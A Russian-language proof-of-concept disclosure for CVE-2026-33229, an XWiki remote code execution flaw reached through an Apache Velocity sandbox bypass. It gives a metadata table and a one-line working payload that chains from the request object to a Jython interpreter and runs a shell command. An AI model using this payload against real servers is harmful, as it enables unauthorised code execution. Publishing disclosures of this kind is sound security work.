
Доказательство концепции эксплуатации для CVE-2026-33229, XWiki RCE через обход песочницы Apache Velocity, с техническими деталями и рабочим эксплойтом.
Уязвимость удалённого выполнения кода в XWiki Platform, которая позволяет аутентифицированному пользователю с правами на написание скриптов полностью обойти песочницу Apache Velocity — без необходимости использования Java Reflection — путём обхода предварительно созданных объектов, уже присутствующих в контексте Velocity.
📄 Полные технические детали: youssefazefzaf.com/posts/cve
| Поле | Значение |
|---|
| ID CVE | CVE-2026-33229 |
| Затронутый продукт | XWiki Platform |
| Компонент | Рендерер макроса Velocity, параметр заголовка страницы |
| Требуемые привилегии | Аутентифицированный пользователь + право на скрипты |
| Воздействие | Удалённое выполнение кода |
| GHSA | GHSA-h259-74h5-4rh9 |
| Обнаружено | 7 ноября 2025 |
| Исправлено | 10 декабря 2025 |
| Раскрыто | 8 апреля 2026 |
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
Уведомление об ответственном раскрытии: PoC опубликован после доступности патча. Не используйте против систем, которыми вы не владеете.